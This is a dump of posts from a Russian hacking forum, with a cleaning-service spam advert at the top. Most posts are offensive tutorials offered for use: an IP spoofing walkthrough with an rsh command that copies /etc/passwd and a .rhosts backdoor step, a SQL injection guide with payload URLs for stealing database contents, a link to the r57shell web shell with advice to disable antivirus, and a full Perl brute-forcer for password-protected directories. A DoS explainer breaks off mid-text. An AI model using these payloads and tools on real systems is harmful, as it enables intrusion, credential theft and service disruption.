https://xterritory.0pk.me/ X-territory ru-ru Sat, 21 Oct 2023 21:34:00 +0300 MyBB/mybb.ru https://xterritory.0pk.me/viewtopic.php?pid=13#p13 <p>Профессиональные услуги клининга: уборка после ремонта, генеральная, поддерживающая, химчистка мягкой мебели, удаление жировых отложений на кухне парогенератором, мытье окон + альпинист и многое другое. Мы также предлагаем ЭКО-чистку детских игрушек, колясок, комнат и различных предметов.&#160; Заказ по тел. +7 915 204 1047 Наш канал: t.me/wwcleaning Москва и Московская область Услуги клининга офиса, квартиры: грязь, пыль, разводы, зеркала, плитка, цемент, краска, светильники, люстры, свч, холодильник, духовка, плита, варочная панель, вытяжка, розетки, выключатели, керамика, смесители, скотч, мусор, шкафы, сантехника, плинтуса, фартук, столешница, стирка, глажка, пятна, загрязнения, диван, кровать &#9989;Уборка квартиры после ремонта &#9989;Уборка после ремонта цена&#160; &#9989;Уборка после ремонта москва&#160; &#9989;Уборка квартиры после ремонта цена&#160; &#9989;Уборка помещений после ремонта&#160; &#9989;Услуги клининга цены&#160; &#9989;Клининг компания услуги&#160; &#9989;Услуги клининга офиса&#160; &#9989;Химчистка мягкой мебели москва&#160; &#9989;Химчистка мягкой мебели +на дому&#160; &#9989;Химчистка мягкой мебели +и ковров&#160; &#9989;Мытье окон +в москве&#160; &#9989;Мытье окон без разводов&#160; &#9989;Клининг компания услуги&#160; &#9989;ЭКО чистка детских кресел&#160; &#9989;Экологическая очистка детских комнат&#160; &#9989;Услуги клининга квартир&#160; Заказ по тел. +7 915 204 1047 Наш канал: <a href="https://t.me/wwcleaning" rel="nofollow" target="_blank">https://t.me/wwcleaning</a>&#160; &#160;Вотсап: <a href="https://wa.me/79152041047" rel="nofollow" target="_blank">https://wa.me/79152041047</a>&#160; Перейти: <a href="https://is.gd/tDRpVO" rel="nofollow" target="_blank">https://is.gd/tDRpVO</a></p> mybb@mybb.ru (toaegytvkq) Sat, 21 Oct 2023 21:34:00 +0300 https://xterritory.0pk.me/viewtopic.php?pid=13#p13 https://xterritory.0pk.me/viewtopic.php?pid=12#p12 <p>Общаемся на разные темы</p> mybb@mybb.ru (Stre@m) Wed, 08 Oct 2008 16:51:22 +0400 https://xterritory.0pk.me/viewtopic.php?pid=12#p12 https://xterritory.0pk.me/viewtopic.php?pid=11#p11 <p>Спуффинг - это ничто иное, как подделывание исходного IP адреса. Хотя мне очень понравилось толкование спуффинга в одном из толковых словарей <a href="http://www.globalsystem.ru/slovar.php/a4539.html." rel="nofollow" target="_blank">http://www.globalsystem.ru/slovar.php/a4539.html.</a> Спуффинг заключается в использовании одной машины, чтобы исполнить роль другой. Чтобы понимать, как это происходит вы должны немного знать об установлении подлинности.</p> <p>Каждый пользователь сталкивался с некоторой формой установления подлинности. Типичный пример этому соединение с сетью. Эта сеть может быть расположена в доме пользователя, его офисе, или как в данном случае Интернет. Большая часть распознавания известная обычному пользователю происходит на прикладном уровне. То есть установление подлинности полностью видны пользователю. Типичный пример этому то, когда пользователь сопоставлен с паролем на FTP или Telnet. Пользователь входит под своим логином и паролем; они заверены, и пользователь получает доступ к ресурсу.</p> <p>В Интернет установление подлинности редко происходит на прикладном уровне. В Интернет каждую секунду происходит, какое либо распознавание, которое является невидимым для пользователя. Различие между этого рода распознавания и распознавания на прикладном уровне фундаментально. Установление подлинности на прикладном уровне происходит приблизительно так: Сервер бросает вызов пользователю и затем просит пользователя идентифицировать себя. Но чаще встречающееся распознавание выглядит чуть-чуть сложнее, здесь уже Сервер требует некоторую форму идентификации от пользователя и пока эта идентификация не проверена и не утверждена никакого обмена данными с Сервером не происходит. Такого рода диалоги &quot;Клиент-сервер&quot; всегда происходят автоматически (т.е. без человеческого вмешательства). При помощи спуффинга хакер пытается капитализировать автоматизацию диалога между машинами. Таким образом, Спуффинг атака - экстраординарный метод получения доступа, потому что при этом, хакер никогда не использует логин или пароль.</p> <p>Кто поддается спуффингу.</p> <p>Спуффинг нападение уникально в том, что может быть осуществлено против некоторого класса машин работающих с TCP/IP. К этим машинам я могу отнести некоторые версии UNIX (очень мало машин, которые легко поддаются спуффингу). Машины, работающие под DOS, Windows и Windows 95 не включены в эту группу. Спуффингу не поддаются Macintosh работающие на MacOS. Теоретически возможно, что Macs, работающий на A/UX, а также Linux могут быть подвержены такого рада атакам, но только при хорошем стечении обстоятельств. Думаю, что позже будут найдено большое количество сервисов подверженных Спуффинг атакам, но пока этот список не очень велик:</p> <p>· Любая конфигурация использующая Sun RPC запросы<br />· Любая служба сети, использующая установление подлинности IP<br />· R services</p> <p>Sun RPC относится к стандарту Sun Microsystems standard of Remote Procedure Calls, которые являются методами выходящих запросов системы, которые работают прозрачно по сетям (то есть выполнения команд по отдаленным машинам или сетям).</p> <p>Уязвимость R services.</p> <p>R services - rlogin и rsh, распространены в среде UNIX. Эти две программы предназначены для удаленного доступа на другие машины в Интернет. Они чем-то напоминают Telnet.</p> <p>Эти программы посвойму уникальны:<br />· Rlogin предназначена, чтобы удаленно логиниться на другую машину. Сегодня, rlogin в основном используется в локальных сетях, и только некоторые сервера поддерживают rlogin для удаленного администрирования т.к. rlogin посчитали проблемой безопасности.</p> <p>· Rsh позволяет Вам получить полный доступ к удаленной машине, и вы можете выполнять на ней любые команды. Например, вы можете получить файл пароля, используя команду: rsh our_target.com cat /etc/passwd &gt;&gt; our_target.com_passwd. rsh. поскольку эта функция является огромной дырой в системе безопасности, она обычно отключается. Но все же существуют сервера, на которых админы полные лохи и эта функция все же остается включенной J.</p> <p>Из всего этого можно сделать вывод, что R services легко поддаются IP спуффингу.</p> <p>Как работает спуффинг</p> <p>Спуффинг отличается от обычного сканирования и использования системных дыр. Спуффинг используется уже тогда, когда определенная машина просканирована и уже точно известно, что она может быть подвержена спуффингу.</p> <p>Трастовые отношения и Спуффинг вообще</p> <p>Почти все формы спуффинга полагаются на трастовые отношения в пределах атакуемой сети. Под трастовыми отношениями я не подразумеваю человеческое доверие, к этому роду доверия я отношу доверие между компьютерами.</p> <p>Существует такое понятие как спуффинг хардварного адреса (Hardware address spoofing). Такой тип спуффинга не относятся к сетевым картам, которые не используют софт для назначения адреса. Старые карты поддерживают изменение адреса через программное обеспечение, обычно с установкой джампера (jumper). Хороший пример этому старенькая карта Western Digital Ethernet. На более новых картах спуффинг адреса карты более чем вероятен, хотя стоит принимать во внимание, что IRQ может все еще устанавливаться при помощи джампера.</p> <p>Этот тип спуффинга работает, потому что каждая машина на данном сегменте сети доверяет ее приятелям на этом же сегменте. Машины в пределах сегмента сети, которые знают адреса их приятелей, упомянуты как машины, которые доверяют друг другу. Когда такие трастовые отношения существуют, эти машины могут отдаленно выполнять команды друг для друга без большего количества установления подлинности, требуется только лишь идентифицировать исходный адрес.</p> <p>Анатомия Спуффинга</p> <p>Давайте начнем наш анализ после того, как хакер определил уровни доверия в пределах сети. Краткий обзор сегмента нашей ложной атакуемой сети, называемой Nexus.<br />Этот сегмент имеет два трастовых отношения:<br />Nexus 1 и Nexus 2, и Nexus 2 и Nexus 3.<br />Чтобы получить доступ Nexus у хакера есть два варианта:<br />Он может обмануть или Nexus 1 или Nexus 3, представив себя как Nexus 2<br />Он может обмануть Nexus 2, представив себя как Nexus 1 или Nexus 3<br />К примеру, хакер решает обмануть Nexus 2, представив себя как Nexus 3. Таким образом, его первая задача состоит в том, чтобы напасть на Nexus 3 и временно вывести ее из строя.</p> <p>Шаг первый: Вывести из строя Nexus 3 Думаю здесь много писать не стоит ……. Можно использовать DoS</p> <p>Шаг второй: Обнаружение Nexus 2</p> <p>Этот шаг процесса довольно прост. Хакер посылает ряд запросов на Nexus 2, который отвечает рядом пакетов, указывающих получение запросов связи Хакера. Содержание этих пакетов ключ к spoofing технике.</p> <p>Шаг третий: Управление</p> <p>Получив образец, хакер делает другой запрос Nexus 2, требуя пустить его от Nexus 3. Nexus 2 отвечает Nexus 3. Однако, потому что Nexus 3 временно выведен из строя, он не отвечает. Вместо этого, идут ответы хакера.</p> <p>Это наиболее трудная часть атаки. Здесь, хакер должен предположить (основанный на его наблюдениях схемы последовательности) какой номер последовательности Nexus 2 ожидает. Но в то время как идет обмен данными, он не может видеть номера последовательности, отправляемые Nexus 2. Поэтому, хакер должен послать его запросы в слепую.</p> <p>Если хакер правильно предполагает номер последовательности, связь установлена между Nexus 2 и машиной хакера. Для всех целей, Nexus 2 теперь полагает, что хакер является Nexus 3.</p> <p>Шаг четвертый: Открытый доступ хакера в эту сеть</p> <p>Хакер должен создать более подходящую дыру, чтобы чтобы всегда проникать в сеть и не прибегать больше к спуффингу. Самый легкий способ заключается в том, чтобы переписать .rhosts файл так, чтобы Nexus 2 принял связи с любого IP и не требовал дополнительное установление подлинности.</p> <p>Заключение</p> <p>Спуффинг атаки случаются очень редко, но все же случаются. Все это из-за того что хакеру проводящему спуффинг атаку требуются специфические инструменты и навыки. Но будем надеяться что будет появляться все больше и больше людей разбирающихся в этой области</p> mybb@mybb.ru (Stre@m) Wed, 08 Oct 2008 16:44:40 +0400 https://xterritory.0pk.me/viewtopic.php?pid=11#p11 https://xterritory.0pk.me/viewtopic.php?pid=10#p10 <p>Перед вами пошаговое руководство по SQL Injection для новичков. Здесь я попытаюсь очень просто объяснить как украсть нужную нам информацию. </p> <p>Эта статья&#160; является как бы итогом множества других статей, вопросов, ответов, практики итд итп. Написал я эту статью чтобы хоть как то облегчить труды новичков в нашем нелегком деле. <br />Итак, начнем. <br />---------------------- <br />ОБНАРУЖЕНИЕ <br />---------------------- <br />Предположим у нас есть цель взломать тот или иной сайт. Иными словами у нас есть жертва. Пусть это будет <a href="http://www.victim.com" rel="nofollow" target="_blank">http://www.victim.com</a>. Как узнать можно ли провести SQL Injection? Чтобы провести иньекцию надо сначала найти скрипт в котором есть нефильтруемая переменая. Предроложим на сайте есть скрипт news.php через который выводятся, например новости. Предположим у нас есть ссылка на &quot;Новость #1&quot;, и ссылка эта такого вида: <br /><a href="http://www.victim.com/news.php?id=1." rel="nofollow" target="_blank">http://www.victim.com/news.php?id=1.</a> <br />Есть также ссылка на &quot;Новость #2&quot; имеющяя сылку вида: <br /><a href="http://www.victim.com/news.php?id=2." rel="nofollow" target="_blank">http://www.victim.com/news.php?id=2.</a></p> <p>Признак возможности провести по SQL Injection номер 1: <br />В адресной строке вместо этого адреса <br /><a href="http://www.victim.com/news.php?id=1" rel="nofollow" target="_blank">http://www.victim.com/news.php?id=1</a> <br />вот этот <br /><a href="http://www.victim.com/news.php?id=1'." rel="nofollow" target="_blank">http://www.victim.com/news.php?id=1'.</a> <br />Если на экран&#160; выводится сообщение об ошибке такого: <br />You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' ORDER BY ndate DESC LIMIT 0, 5' at line 1 <br />или такого вида*: <br />Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/lol/data/www/www.victim.com/news/news.php on line 569 <br />то SQL Injection возможна.</p> <p>Признак возможности провести по SQL Injection номер 2: <br />Если содержимое <br /><a href="http://www.victim.com/news.php?id=1" rel="nofollow" target="_blank">http://www.victim.com/news.php?id=1</a> <br />то же что и у <br /><a href="http://www.victim.com/news.php?id=2-1" rel="nofollow" target="_blank">http://www.victim.com/news.php?id=2-1</a> <br />то SQL Injection возможна.</p> <p>Из всего этого понятно что нефильтруемая переменая id и именно ей мы будем присваивать наши запросы.</p> <p>--------- <br />ПОЛЯ <br />--------- <br />Для начала мы должны узнать количество полей в таблице и узнать значение какого поля высвечивается, чтобы потом через это поля выудить информацию. <br />Сделать это можно двумя способами. <br />Способ первый: <br />Банально перебирая количество полей, пока сообщение об ошибке не исчезнет. Пример: <br /><a href="http://www.victim.com/news.php?id=1+union+select+1,2,3,4/*" rel="nofollow" target="_blank">http://www.victim.com/news.php?id=1+uni &#8230; +1,2,3,4/*</a> и так далее.</p> <p>Способ второй: <br />С помощью оператора ORDER BY, который формирует порядок сортировки полей по номеру (и не только), поля, т.е если выражение: <br /><a href="http://www.victim.com/news.php?id=1+order+by+5/*" rel="nofollow" target="_blank">http://www.victim.com/news.php?id=1+order+by+5/*</a> <br />не выдаст ошибку - это значит что в запросе используется как минимум 5 полей. Ввожу еще одно выражение: <br /><a href="http://www.victim.com/news.php?id=1+order+by+13/*" rel="nofollow" target="_blank">http://www.victim.com/news.php?id=1+order+by+13/*</a> <br />Это выражение выполнится с ошибкой, т.к. 13 -го поля не существует и теперь нам известно что полей в выражении не меньше 5 и не больше 12. Выбираю любое число из этого диапазона (примерно среднее): <br /><a href="http://www.victim.com/news.php?id=1+order+by+8/*" rel="nofollow" target="_blank">http://www.victim.com/news.php?id=1+order+by+8/*</a> <br />Ошибки нет, а это значит что количество полей находится в диапазоне от 8 до 12, Еще раз: <br /><a href="http://www.victim.com/news.php?id=1+order+by+10/*" rel="nofollow" target="_blank">http://www.victim.com/news.php?id=1+order+by+10/*</a> <br />Ошибка!. т.е количество полей или 8 или 9, остается только попробывать: <br /><a href="http://www.victim.com/news.php?id=1+order+by+9/*" rel="nofollow" target="_blank">http://www.victim.com/news.php?id=1+order+by+9/*</a> <br />Ошибки нет. Т.о. мы узнали что количество полей равно 9. <br />Получаем определенную информацию. <br />Т.к. мы знаем что у нас 9 полей мы можем составить работающее выражение: <br /><a href="http://www.victim.com/news.php?id=1+union+select+1,2,3,4,5,6,7,8,9/*." rel="nofollow" target="_blank">http://www.victim.com/news.php?id=1+uni &#8230; 6,7,8,9/*.</a></p> <p>Итак, мы узнали количество полей. Их 9. Предположим что высвечивается значения 1, 2 и 3 поля.</p> <p>----------- <br />ИМЕНА <br />----------- <br />Чтобы вытянуть информацию нужно сначала узнать имена таблиц и полей. <br />Ну чтож, начнем. <br />Есть такая замечательная БД INFORMATION_SCHEMA и в ней есть замечательная таблица TABLES и в ней есть замечательные поля TABLE_SCHEMA и TABLE_NAME. Вот с их помощю мы и узнаем имена таблиц. Вот запрос: <br /><a href="http://www.victim.com/news.php?id=1+union+select+table_schema,table_name,3,4,5,6,7,8,9+from+information_schema.tables." rel="nofollow" target="_blank">http://www.victim.com/news.php?id=1+uni &#8230; ma.tables.</a> <br />Теперь в нашем броузере отобрязятся все таблицы Базы Данных. <br />Остается узнать имена полей. Для этого набираем в адресной строке <br /><a href="http://www.victim.com/news.php?id=1+union+select+1,column_name,3,4,5,6,7,8,9+from+information_schema.columns." rel="nofollow" target="_blank">http://www.victim.com/news.php?id=1+uni &#8230; a.columns.</a> <br />Как можно увидеть мы поставляем имена полей вместой той цифры которая отображается на экране. <br />----------- <br />ПОСЛЕСЛОВИЕ <br />----------- <br />Также хотелось бы вам рассказать о двух вещях. <br />Первое:оператор LIMIT. <br />Если все проходит не так гладко как хотелось бы то в самом конце запроса мы добавляем LIMIT a,b что означает показать b записей начиная от а. <br />Второе:Коментарий /*. <br />Если и лимит не помог то попробуйте в самом конце запроса поставить символ комментария. Если ставим знак коментария то остальная часть запроса отбрасывается. <br />Вот собственно и все</p> mybb@mybb.ru (Stre@m) Wed, 08 Oct 2008 16:41:45 +0400 https://xterritory.0pk.me/viewtopic.php?pid=10#p10 https://xterritory.0pk.me/viewtopic.php?pid=9#p9 <p>популярный php шелл.<br /><a href="http://letitbit.net/download/185f03850511/r57shell.php.html" rel="nofollow" target="_blank">Скачать</a><br />Во время скачивания и использования вырубите антивирь(если есть)</p> mybb@mybb.ru (Stre@m) Wed, 08 Oct 2008 10:42:39 +0400 https://xterritory.0pk.me/viewtopic.php?pid=9#p9 https://xterritory.0pk.me/viewtopic.php?pid=8#p8 <p>Статья довольно старая, но актуальная..<br />Введение<br />У шелла может быть множество разных применений, начиная с удобной работы с файлами на сервере (в случае если шелл был предоставлен хостером) и заканчивая разнообразными взломами через этот шелл. Большинство служб (если их можно так назвать, предоставляющих шелл, вместе с ним дают место под сайт. Конечно, его не очень много (хотя всё зависит от конкретного сервера), но зато там разрешают использовать perl, etc, чем может похвастаться не любой бесплатный хостинг…. гм, что-то я увлекся %). Так вот, шелл может оказаться весьма полезной фичей. Почему? Во-первых, канал. На уважающем себя хостинге канал должен быть широкий. Во-вторых, железо. Пень 166 для хостинга не пойдёт %). Следовательно, можно запускать задачи наподобие john (что это такое чуть ниже), требующие мощного проца. Да и вообще, шелл нужен! =)</p> <p>Получаем шелл-аккаунт<br />Возникает закономерный вопрос: где же получить бесплатный shell-аккаунт? Идём на Ссылки только для зарегистрированных пользователей. и пишем в строке поиска: «UNIX + SHELL + FREE». Нам выдаётся куча ссылок по запросу. Можно, конечно, сидеть, копаться, искать наиболее подходящий для вас шелл, но если делать этого особо не хочется, то вот вам ссылка на наиболее симпатичный мне сайт, где можно получить шелл: Ссылки только для зарегистрированных пользователей.. К тому же, сервер находится недалеко от Бельгии, что подразумевает достаточно высокую скорость передачи между вами и сервером. Регистрируемся на этом сайте (поля заполнять на буржуйском, e-mail писать ваш, а не чужой). В поле «Give a short description of what will be done with your account:» напишите что-нибудь типа «I want create a cool homepage», ну или что-то в этом роде (про хак ничего не писать!%)). На мыло приходит письмо от rootshell.be Support support@rootshell.be с вашим логином, автоматически сгенерированным паролем, хостом, к которому нужно подключаться, и прочей чушью. Если позже захочешь сменить пасс, иди на Ссылки только для зарегистрированных пользователей., в поле «Login» пиши свой логин, и на твоё мыло придёт новый пароль. Ну всё, зарегались… что делать дальше? Обычно шеллы бывают с доступом по telnet (23 порт) и SSH (22 порт). Если ваш шелл использует первое, тогда для соединения с ним сойдёт виндовая утилита telnet. Находится она в %Директория_с_Виндой%/System32/telnet.exe, ну или Пуск-&gt;Выполнить-&gt;telnet. Далее расписывать использование telnet не буду, т.к. служба, рассматриваемая мной, использует SSH2. Скажу лишь, что по телнету есть небольшой help в %Директория_с_Виндой%/Help/telnet.chm с командами самой программы, а для управления шеллом используются всё те же команды, что и для SSH. В нашем случае всё немного сложнее, т.к. винда не имеет встроенного SSH-клиента. В инете есть много подходящих софтин, но мне больше нравится Putty (кстати, он поддерживает и telnet). Качаем его, например, отсюда. Запускаем Putty.exe и изменяем опции соединения по своему вкусу (ну или по вкусу шелла . Напомню, что я расписываю работу с rootshell.be, для других служб настройки будут выглядеть несколько иначе. Во вкладке Session в Host Name пишем «phenix.rootshell.be» и нажимаем SSH. Port должен был смениться на 22. Идём на вкладку Connection-&gt;SSH. Preferred SSH protocol version ставим SSH2 only. На вкладке Session сохраняем наши настройки под новым именем и нажимаем Open. Открылось чёрное окно, где нас просят ввести логин. Что ж, вводим%). Далее нужно ввести пароль. Смотрим письмо, пришедшее нам от rootshell.be, и оттуда вводим пароль (обязательно соблюдайте регистр!). Если всё сделано правильно, то через пару секунд ты попадёшь на свой шелл. Если же этого не произошло, попробуй ещё раз, вдруг ты что-то неправильно сделал… Можно пробежаться по тексту, любезно выведенному для нас, там обычно пишут последние новости, связанные с работой сервера. Всё, мы на шелле…</p> <p>Работа с шеллом<br />Что теперь делать? Да всё то же, что ты делаешь на своём компе, только немного в другой, непривычной форме. Если ты работал в ОС Linux/FreeBSD/OpenBSD/etc, то особых проблем возникнуть не должно… Если же нет, то для начала я бы посоветывал прочитать какую-нибудь книгу по Linux, пусть небольшую, но всё же… В этой статье я не могу описать даже одну милионную часть работы с этой операционкой. Ну ладно, чтобы не грузить тебя, дам пока кое-какие команды, часто используемые «хакерами» на шелле %):<br />at - указание времени когда выполняется команда<br />chown - смена хозяина файла<br />batch - выполнить команду во время загрузки<br />telnet - клиент телнет<br />ftp - клиент фтп<br />rmdir - удалить каталог<br />finger/who/users - вывести список работающих в системе.<br />gcc - компилятор C<br />ftpwho - фингер для фтп<br />mv - переместить файл<br />kill - прекратить процесс<br />cat - текстовой редактор<br />ls - просмотр каталога<br />chmod - смена привилегий файлового доступа<br />rm - удалить файл<br />id - просмотр прав, т.е.uid и gid<br />mail - работа с мылом<br />cd - сменить каталог<br />cron - демон команд at и batch<br />logname - получение имени регистрации<br />cp - копирование чего либо.<br />uname -a - всё о версии системы.<br />crontab - задать резервы времени между запусками прог.<br />ps - ознакомление со списком процессов.<br />pwcheck - просмотр дефолтового файла пароля.<br />umask - маска для определённого файла.<br />su - программа su<br />sleep - преостановить процесс.<br />passwd - работа с паролем.<br />news - отображение usenet<br />write - мессага текущему юзеру.<br />uux - выполнить комманды на remote компе<br />nslookup - сводки гидромедцентра о IP<br />uucp - копирование файл с/на remote комп<br />uuname - список хостов UUCP<br />more - вывод текстовика в постраничном режиме<br />greg - поиск строки в фйле по заданному ключу<br />greg -i - то же,без учёта регистра.<br />uuencode - содание текстовой версии двоичного файла( для мыла)<br />uudecode – создание двоичной версии текстового файла<br />tar - создание архивов файлов.<br />uncompress - получение исходного из сжатого файла.<br />uptime – время запуска машины.<br />ping - %) читай man.</p> <p>Принцип ввода и выполнения команд имеет постоянную схему: команда, ключи, параметры. Например, для просмотра директории командной ls с ключом –la, нужно ввести «ls –la». По большинству команд есть т.н. help, в котором описывается синтаксис вызова команды, ключи, etc. Для вызова вызова help’а по команде ls нужно ввести «ls --help». Так же у многих программ имеется неплохое справочное руководство, которое вызывается следующим образом: man команда. Например, для команды ls его можно получить так «man ls». Дальше расписывать работу с *nix-системами не буду, т.к. всё это есть в любой книге по ним.</p> <p>Принцип ввода и выполнения команд имеет постоянную схему: команда, ключи, параметры. Например, для просмотра директории командной ls с ключом –la, нужно ввести «ls –la». По большинству команд есть т.н. help, в котором описывается синтаксис вызова команды, ключи, etc. Для вызова вызова help’а по команде ls нужно ввести «ls --help». Так же у многих программ имеется неплохое справочное руководство, которое вызывается следующим образом: man команда. Например, для команды ls его можно получить так «man ls». Дальше расписывать работу с *nix-системами не буду, т.к. всё это есть в любой книге по ним.</p> <p>Работа с брутфорсом<br />Теперь перейдём непосредственно к практике. По многочисленным просьбам трудящихся опишу работу с брутфорсом. Под Linux существует много разных брутфорсов: и для аси, и для мыла, и для Ссылки только для зарегистрированных пользователей. и для etc. Наиболее распространенным брутфорсом под *nix является John The Ripper. У него достаточно много функций, написан он на Си… Но его надо устанавливать, чего я не люблю%). Если кому-то интересно, то качайте john’a отсюда. Чтобы распаковать его используйте программу tar с нужными параметрами, например, «tar zxvf john-1.6.tar.gz». Чтобы узнать о этой команде всё, юзай «man tar».<br />Ах, да, чуть не забыл сказать, как закачать на шелл нужную программу. Для этого есть удобная утилита wget. Для её использования достаточно ввести: wget ссылка_на_файл. В нашем случае это будет «wget Ссылки только для зарегистрированных пользователей.». Кстати, wget умеет закачивать целые сайты… После распаковки заходим в каталог с программой: «cd john-1.6.tar.gz». Если не охота лазить по дирам набивая команды, можно запустить файловый менеджер: «mc». В нём, я думаю, ты и сам разберёшься. Читаем readme, install, etc. После этого особых вопросов в установке и использовании программы возникнуть не должно. Если же они будут, спрашивайте здесь… по возможности ответим%). Сейчас же мы будем юзать перловский брутфорс. Чем он удобен? Его не надо устанавливать! Брутфорсов, написанных на перле, много… используй поисковые службы. Обычно, каждый из них выполняет только определённую функцию, например, только брутит мыло, или только асю, но бывают и исключения. Допустим, ты закачал на шелл какой-нибудь брутфорс, написанный на перле. Как его запустить? Обычно программа на перле – это файл с расширением .pl. Заходи в каталог со скриптом и набивай там команду «perl название.pl». Если же ты хочешь, чтобы программа работала в background’е (это относится не только к брутам, но и к остальным программам), то напиши в конце команды символ &amp;. Например, «perl название.pl &amp;». Для примера, я покажу вам, как использовать перловый брутфорс для запароленных директорий на Ссылки только для зарегистрированных пользователей. написанный Forb’ом. В этом случае имя пользователя должно быть известно.</p> <p>#!/usr/bin/perl</p> <p>## Autors: Mike: mike@eggru.com, Forb: dmitry@dokuchaev.com<br />## Modified by sikeirosa: sikeirosa@mail.ru</p> <p>use MIME::Base64;<br />use IO::Socket;<br />use POSIX; ### Подрубаем модули POSIX, Socket и Base64</p> <p>$server=&quot;127.0.0.1&quot;; ### Удаленный сервер<br />$port=&quot;80&quot;; ### Удаленный порт<br />$dir=&quot;/admin&quot;; ### Запароленная директория<br />$logfile=&quot;sucess.log&quot;; ### Логфайл, куда пишем пароль<br />$log=&quot;now.log&quot;; ### Логфайл, куда пишем статус (что происходит в данную минуту)<br />$words=&quot;bigdict.txt&quot;; ### Словарь (файл с паролями)<br />$users=&quot;users.txt&quot;; ### Имя пользователя</p> <p>open(file, &quot;&lt;$words&quot;) or die print &quot;$!\n&quot;;<br />@pwd_data=;<br />$total=@pwd_data;<br />close file; ### Записываем все пароли в один массив</p> <p>open(file, &quot;&lt;$users&quot;) or die print &quot;$!\n&quot;;<br />@users_data=;<br />$total*=@users_data;<br />close file; ### Записываем всех пользователей в один массив</p> <p>$i=0;<br />foreach $user (@users_data) {<br />foreach $pass (@pwd_data) {<br />$i++;<br />chomp($pass);<br />chomp($user);<br />open(file, &quot;&gt;$log&quot;) or die print &quot;$!\n&quot;;<br />$perc=($i*100)/$total;<br />$perc=ceil($perc); ### Высчитываем процент<br />print file &quot;$perc\% Done\t$i of $total\t\tNow: $user\:$pass\n&quot;; ### Пишем в лог статус<br />close file;</p> <p>$auth=encode_base64(&quot;$user\:$pass&quot;); ### Создаем Mime-хеш<br />chomp($auth);</p> <p>### Порождаем сокет<br />$socket=IO::Socket::INET-&gt;new( PeerAddr =&gt; $server, PeerPort =&gt; $port, Proto =&gt; 'tcp', Type =&gt; SOCK_STREAM) or die print &quot;Unable to connect to $server:$port\n&quot;;<br />print $socket &quot;GET $dir Ссылки только для зарегистрированных пользователей.&quot;;<br />print $socket &quot;Host: $server\n&quot;;<br />print $socket &quot;Accept: */*\n&quot;;<br />print $socket &quot;Referer: Ссылки только для зарегистрированных пользователей.&quot;;<br />print $socket &quot;User-Agent: Internet Explorer 6.0\n&quot;;<br />print $socket &quot;Pragma: no-cache\n&quot;;<br />print $socket &quot;Cache-Control: no-cache\n&quot;;<br />print $socket &quot;Authorization: Basic $auth\n&quot;;<br />print $socket &quot;Connection: close\n\n&quot;; ### Отправляем Ссылки только для зарегистрированных пользователей.данные + Mime-хеш</p> <p>$ans=&lt;$socket&gt;; ### Получаем ответ от сервера</p> <p>if ($ans=~/200 Ok/i or $ans=~/301/i) {<br />open(logf, &quot;&gt;&gt;$logfile&quot;) or die print &quot;$!\n&quot;; ### Если пароль верный - пишем в success-лог<br />print logf &quot;$user:$pass is OK!!!\n&quot;;<br />close logf;<br />}<br />close($socket);<br />}<br />}<br />Это исходник его брутфорса. Переменные $server, $port, $log, $dir, $logfile, $words, $users необходимо изменить на ваши. Делаем у себя на компе файл brut.pl, вставляем в него код. Также делаем файлы success.log, now.log (оставляем их пустыми). В папку с со всей этой бодягой ложим файл с паролями и переименовываем его на bigdict.txt. И там же создаём файл users.txt и пишем в него имя юзера. Теперь нам нужно закачать всё это на наш шелл. Как это сделать? Можно, конечно, залить файлы на какой-нить сайт, а потом оттуда сливать wget на шелл. Но мы так делать не будем. На rootshell.be есть ftp, через который можно всё это залить к нам в домашнюю директорию. Берём какой-нибудь фтп-клиент, создаём там новое соединение. Имя сервера: ftprootshell.be, а логин с паролем те же, что вы используете для доступа к шеллу. Всё, коннектимся туда, заливаем наши файлы в одну папку, например, brut. Теперь коннектимся к шеллу… Видите, там появились наши файлы%). Заходим в нашу папку: «cd brut». И уже там пишем команду «perl brut.pl» или «perl brut.pl &amp;».<br />Всё, процесс пошёл, и если тебе повезёт, то через некоторое время в файле success.log появится правильный пароль </p> <p>Вот и всё, что я хотел сегодня рассказать.....</p> mybb@mybb.ru (Stre@m) Wed, 08 Oct 2008 10:39:08 +0400 https://xterritory.0pk.me/viewtopic.php?pid=8#p8 https://xterritory.0pk.me/viewtopic.php?pid=7#p7 <p>Цель </p> <p>Основная цель DoS/DDoS-атак - вывести объект из рабочего состояния. Конечно, в большинстве случаев глобальная атака приводит к большим финансовым потерям со стороны атакуемого. Например, если какой-либо коммерческий сайт упадет на несколько часов, то это нанесет вред бизнесу, а если на неделю, то владелец ресурса вполне может разориться. Или взять локальные сети. Дело в том, что одним из эффектов популярных атак на Denial of Service (DoS) является огромный трафик, направляемый на жертву. Если для крупной западной фирмы это мелочь, то для небольшой отечественной домашней сети средняя атака может грозить разорением. Кроме огромного вреда, наносимого жертве, такие нападения отличаются простотой и огромной эффективностью. Против них нет стопроцентной защиты. Именно названные выше факторы привлекают к DoS внимание специалистов по сетевой безопасности и... DoS'еров. <br />Принцип работы </p> <p>Для того чтобы обнаружить, а уж тем более организовать DoS/DDoS-атаку, нужно разобраться в ее принципах. Эти атаки не направлены на получение доступа к ресурсам или к важной информации. Атака DoS делает ресурс недоступным для использования путем нарушения его нормальной работы. Атаку на отказ в обслуживании можно провести всего двумя способами: использовав уязвимости в программном обеспечении жертвы и при помощи отсылки большого количества определенно составленных сетевых пакетов (флуд). Первый способ состоит в том, чтобы, используя уязвимости типа переполнения буфера, отослать код, выполняющий DoS на сервере. Поскольку атака будет проводиться &quot;изнутри&quot;, то через очень короткое время объект зависнет или будет отключен от интернета. Этот способ не требует больших вычислительных ресурсов нападающего, однако такая атака предполагает использование уязвимостей, что само по себе усложняет задачу. Поскольку никто не хочет излишне заморачиваться, в народе более популярен второй способ, которому мы и уделим основное внимание. Это пример применения простой грубой силы, которая практически не нуждается в приложении ума. Идея состоит в том, чтобы переслать как можно больше &quot;кривых&quot; запросов серверу (впрочем, не только &quot;кривых&quot;: от огромного количества нормальных пакетов, например GET-запросов для [Только зарегистрированные пользователи могут видеть ссылки.]сервера хосты падают с таким же успехом). Дело в том, что при получении сервером пакета данных происходит его обработка. Если приходит пакет, но сервер занят приемом или обработкой другого пакета, то вновь приходящий запрос ставится в очередь, занимая при этом часть ресурсов системы. При проведении DoS-атаки серверу отсылается большое количество пакетов определенного размера. При этом ответ сервера не ожидается (обычно адрес отправителя фальсифицируется - спуфинг). В результате, из-за того что сервер оказывается перегружен информацией, он либо отключается от интернета, либо зависает. В любом случае, нормальные пользователи некоторое время (иногда довольно продолжительное) не 